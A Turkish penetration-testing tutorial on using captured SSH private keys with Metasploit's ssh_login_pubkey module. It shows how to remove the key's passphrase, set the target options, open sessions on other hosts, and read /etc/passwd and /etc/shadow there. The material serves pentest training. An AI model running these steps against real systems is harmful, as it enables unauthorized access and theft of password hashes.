MSF ssh_login_pubkey Auxiliary Modülü ve Elde Edilen SSH Özel Anahtarları ile Linux Bilgisayarlara Komut Satırı Bağlantısının Elde Edilmesi

Linux sızma testleri sırasında, bir şekilde elde edilen SSH özel anahtarları (private key) kullanılarak SSH servisi açık olan diğer sistemlere sızılmaya çalışılır. Bu yazıda, elde edilen bir takım SSH özel anahtarları ve MSF ssh_login_pubkey auxiliary modülü ile ağda SSH servisi açık olan sistemlere erişim sağlanacaktır.

Sızma testleri sırasında “id_rsa_anahtari” adlı bir anahtar elde edilmiş olsun.

cd Desktop
ls -la id*
cat id_rsa_anahtari

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-01

 

Bu anahtar ile oturum açılabilecek sistemlere erişimler için kullanılabilecek MSF ssh_login_pubkey auxiliary modülünün özellikleri incelenir.

search ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
show options

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-02

 

Bu modül parola koruması olan özel anahtarları kabul etmemektedir. Bu sebeple parolası olan özel anahtarların parolası kaldırılmalıdır.

ls -la id*
cat id_rsa_anahtari

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-03

 

Parola kaldırılması için ssh-keygen aracı kullanılabilir:

ssh-keygen -p -f /root/Desktop/id_rsa_anahtari

 

Modülün seçenekleri ayarlanır:

set RHOSTS 100.100.200.7
set USERNAME yenikullanici
set KEY_PATH /root/Desktop/id_rsa_anahtari

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-04

 

Not: KEY_PATH seçeneğine dizin de verilebilir. Ancak false pozitif durumlar çıkabilmektedir.

Modül çalıştırıldığında erişim sağlanabilecek IP’lere bağlantı açıkmış olur.

run

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-05

 

Bu bağlantı erişim sağlanan kullanıcının yetkileri ile gerçekleşir.

sessions -l
sessions -i 1
id
cat /etc/passwd | head -5
cat /etc/shadow | head -5

obtaining-command-shell-by-using-obtained-ssh-private-keys-via-msf-ssh-login-pubkey-auxiliary-module-06

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.